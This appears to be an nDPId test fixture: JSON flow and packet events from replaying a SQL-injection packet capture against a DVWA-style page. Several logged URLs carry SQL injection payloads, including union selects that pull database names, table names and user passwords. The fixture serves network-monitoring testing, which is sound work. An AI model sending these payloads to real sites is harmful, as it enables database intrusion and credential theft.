+01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
